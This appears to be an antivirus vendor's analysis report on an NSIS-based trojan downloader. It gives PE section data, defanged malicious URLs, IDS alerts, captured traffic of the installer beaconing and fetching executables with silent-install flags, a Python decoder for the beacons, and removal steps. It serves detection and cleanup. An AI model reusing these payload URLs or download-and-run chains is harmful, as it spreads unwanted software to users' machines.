Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
| .rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
| .data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
| .ndata | 147456 | 2125824 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 2273280 | 2528 | 2560 | 3.12379 | 6c32aa39199a42052d5b9d646394f08c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 4
3cc57d62125a365e0ff6201b70287906
c5acb017c8a1c1610092143cfe7c575f
446f59bd241950572e32cdc0b91875f6
75575eb58aab24025966cd48526b2a5d
URLs
| URL | IP |
|---|---|
| hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | |
| hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | |
| hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | |
| hxxp://livestatscounter.com/SysInfo/validator/timer.php | |
| hxxp://djapp.info/?file=bundle&v=2 | |
| hxxp://d2fpsq9kg43yka.cloudfront.net/prepreinstaller_win.exe | |
| hxxp://d2fpsq9kg43yka.cloudfront.net/SilentInstaller_dotnet4.exe | |
| hxxp://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= | |
| hxxp://json.agewftkv.com/?adv_id=128&domain=AGEwfTkv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en&w64=0 | |
| hxxp://d2u4zym7ey0920.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | |
| hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
| hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
| hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | |
| hxxp://d2u4zym7ey0920.cloudfront.net/prepreinstaller_win.exe | |
| hxxp://www.downloadsoup.com/thankyou.php | |
| hxxp://www.djapp.info/?file=bundle&v=2 | |
| hxxp://d2u4zym7ey0920.cloudfront.net/SilentInstaller_dotnet4.exe | |
| hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | |
| d20ssor9owizgr.cloudfront.net | |
| d24u51ac8ybaqu.cloudfront.net | |
| s3.amazonaws.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY Executable served from Amazon S3
ET MALWARE Possible Windows executable sent when remote host claims to send html content
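The URL list above carries a base64-encoded "p" parameter on events.agewftkv.com, and the Traffic section that follows shows the installer POSTing JSON whose "data" field is itself a JSON string. The Python below is an added example, not code from the report or from the installer's authors; it decodes both so the beacons can be read as a timeline: the tracking parameter is unpacked into key/value pairs, each POST body is flattened into one event record, and 1722/1723 event pairs are matched as download started/finished with errorlevel, which is the pattern visible in this capture. Sample inputs are copied from the page (the capture defangs http as hXXp and the decoder keeps strings as recorded); the meaning of the event IDs is inferred from the capture, not documented by the report.

```python
import base64
import json
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed samples copied from the URL list and the Traffic section above.
TRACKING_URL = "http://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg="

POST_BODIES = [
    r'{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}',
    r'{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}',
    r'{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}',
    r'{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}',
    r'{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}',
]


def decode_event_post(body):
    """Unwrap the JSON-in-JSON POST body into one flat event record."""
    outer = json.loads(body)
    inner = json.loads(outer["data"])        # "data" is itself a JSON document
    params = dict(parse_qsl(inner.get("utm_addition", ""), keep_blank_values=True))
    return {
        "table": outer["table"],
        "event_id": inner["event_event_id"],
        "channel": inner["channel_id"],
        "params": params,
    }


def decode_tracking_url(url):
    """Decode the base64 'p' parameter of the events.* URL into key/value pairs."""
    # Split the query by hand: parse_qs would turn a literal '+' (a valid
    # base64 character) into a space and corrupt the payload.
    raw = None
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "p":
            raw = unquote(value)
            break
    if raw is None:
        raise ValueError("no 'p' parameter in URL")
    raw += "=" * (-len(raw) % 4)             # tolerate stripped padding
    decoded = base64.b64decode(raw).decode("utf-8")
    return dict(parse_qsl(decoded, keep_blank_values=True))


def download_chain(events):
    """Pair each 1722 (download started) with the 1723 (finished, with errorlevel)
    for the same URL, in the order observed; the ID meanings are inferred from
    this capture, not documented by the report."""
    started = set()
    chain = []
    for ev in events:
        url = ev["params"].get("url")
        if ev["event_id"] == "1722" and url:
            started.add(url)
        elif ev["event_id"] == "1723" and url in started:
            chain.append((url, ev["params"].get("errorlevel")))
    return chain


if __name__ == "__main__":
    print(decode_tracking_url(TRACKING_URL))
    for url, rc in download_chain(decode_event_post(b) for b in POST_BODIES):
        print(f"downloaded {url} (errorlevel={rc})")
```

The decoded tracking parameter ties the pieces of the chain together: its adv_id=128 is the same identifier as in the json.agewftkv.com query and in the dropped adv_128.exe, and its extra_params names the SilentInstaller stage. The 1722/1723 pairing shows the telemetry endpoint receiving a report for every secondary download, which is what the ET POLICY alert on the NSIS_Inetc user agent is keyed on.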
Traffic
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:27:52 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:27:52 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:27:53 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:03 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:04 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:14 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 185
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:15 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 198
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:25 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:26 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 503 Service Unavailable
Cache-Control: no-cache
Content-Type: text/html
transfer-encoding: chunked
Connection: keep-alive
<html><body><h1>503 Service Unavailable</h1>
No server is available to handle this request
</body></html>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 164
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:37 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:47 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:48 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=ad70c77a656a8cbfc8becf0386552d1e&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=C8318CA6891F5119A9FD96EC19E98D71&sysid1=C8318CA6891F5119A9FD96EC19E98D71&te=1450916936&ts=1450916936&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:\DOCUME~1\adm\LOCALS~1\Temp\nsh1D.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 24 Dec 2015 00:28:50 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 24 Dec 2015 00:27:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.30
hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
 /md=2 /v=obi-tot-mdh-lvs-ppt-opw-jot-crr
hXXp://livestatscounter.com/SysInfo/validator/timer.php
hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe
 asslHp==02OR:Ll5tt.R9Ryf?L~0n:LPsyPWs=ftil=__R9ylls
hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe
 /ch=NOCHPC
hXXp://VVV.djapp.info/?file=bundle&v=2
 -pub_id=353 -adv_id=128
hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe
 /ci 11612
hXXp://VVV.czzsyzgm.com/pptxd.exe

hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=NOCHPC

hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483

hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542

hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe
/VERYSILENT
hXXp://counter99.com/SysInfo/r2d.php?guid=587785-23098-234-1123F

hXXp://VVV.codec13sudha.com/download.php?l4J9dw==
hXXp://download-servers.com/SysInfo/Validate.exe
 /s
hXXp://download-servers.com/SysInfo/Validate.exe
 /s
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 24 Dec 2015 00:28:03 GMT
Content-Type: application/octet-stream
Content-Length: 127888
Connection: keep-alive
X-Powered-By: PHP/5.5.30
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=L5lD0nHnr.exe
GET /prepreinstaller_win.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2u4zym7ey0920.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 557568
Connection: keep-alive
Date: Tue, 22 Dec 2015 12:42:57 GMT
Last-Modified: Tue, 22 Dec 2015 09:35:36 GMT
ETag: "29bf30427bc3544fab563d0d7d36f05d"
Accept-Ranges: bytes
Server: AmazonS3
Age: 42245
X-Cache: Hit from cloudfront
Via: 1.1 edd2a5d0833e10b384dd66f5bbc84266.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gSQrgtUsaSNcpkgie_cOo1RXuzq_xv7DpIICzGiC8GVJPP5uCTluSA==
GET /?file=bundle&v=2 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.djapp.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 24 Dec 2015 00:34:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://d2u4zym7ey0920.cloudfront.net/prepreinstaller_win.exe
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 84407
Connection: keep-alive
Date: Wed, 23 Dec 2015 11:09:11 GMT
Last-Modified: Wed, 23 Dec 2015 11:04:25 GMT
ETag: "dd326cafa8f8dfb20c5183a1cc3daab6"
Accept-Ranges: bytes
Server: AmazonS3
Age: 47923
X-Cache: Hit from cloudfront
Via: 1.1 4919a7516ec7acdb985d9d24c36a649b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: G0vkfgWSWmOoG3LP2Cs8yt7QCNjeLl4AM_Jc_0hjQ8A1kuw7WKreOw==
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 58595
Connection: keep-alive
Date: Wed, 09 Dec 2015 22:28:08 GMT
Last-Modified: Wed, 09 Dec 2015 20:28:24 GMT
ETag: "a66865416d1330f1c571c12f4f8c2fea"
Accept-Ranges: bytes
Server: AmazonS3
Age: 41613
X-Cache: Hit from cloudfront
Via: 1.1 8f460f85e7788562e9f2e44d0aedb11b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: wZX_L_EIjMsRp5H97nPRdzmv0gZK5VHBrULbLCc3Sxr95FlWrdhyIg==
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 24 Dec 2015 00:28:48 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1444112779"
Last-Modified: Tue, 06 Oct 2015 06:26:19 GMT
Cache-Control: max-age=27832
Content-Length: 116063
Content-Type: application/octet-stream
X-HW: 1450916928.dop010.fr7.t,1450916928.cds007.fr7.c
GET hXXp://json.agewftkv.com/?adv_id=128&domain=AGEwfTkv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en&w64=0 HTTP/1.1
Host: json.agewftkv.com
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 00:34:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
{
  "advID": 128,
  "primaryOfferInstallPath": "hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe",
  "secondaryOfferInstallPath": "hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe",
  "requireUnzip": false,
  "requireSuccessInstallCheck": true,
  "requireExitCodeCheck": false,
  "successExitCode": 0,
  "constParams": "-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",
  "mappedParams": [],
  "requireRegKeysCheck": true,
  "regKeysToCheck": [
    "LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",
    "LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"
  ],
  "minutesToSleepBeforeInstall": 0,
  "preInstallRegCheck": true,
  "preInstallRegKeys": [
    "LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",
    "LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"
  ],
  "blockIfInstalled": false
}
GET hXXp://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= HTTP/1.1
Host: events.agewftkv.com
Proxy-Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 00:34:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET /SilentInstaller_dotnet4.exe HTTP/1.1
Host: d2u4zym7ey0920.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 321536
Connection: keep-alive
Date: Tue, 22 Dec 2015 12:43:01 GMT
Last-Modified: Tue, 22 Dec 2015 09:32:50 GMT
ETag: "a85df53ac3cdc0b948809c73b39b0571"
Accept-Ranges: bytes
Server: AmazonS3
Age: 42158
X-Cache: Hit from cloudfront
Via: 1.1 4919a7516ec7acdb985d9d24c36a649b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Ck257rROkJVx5Ros0xI9HVewGDQJh8hFl1C5WoDiTXNhxH9I0456Rw==
The Trojan connects to the servers at the following location(s):
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsh1D.tmp:260
nsh1D.tmp:1264
Bind.exe:776
amisid.exe:828
ppt.exe:1788
%original file name%.exe:1332
nsr1A.tmp:2012
nst16.tmp:264
nsw7.tmp:1224
nsn24.tmp:1984
setup3.exe:408
nsoB.tmp:284
setup3.tmp:1040
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188757 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pptxd[1].exe (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (15 bytes)
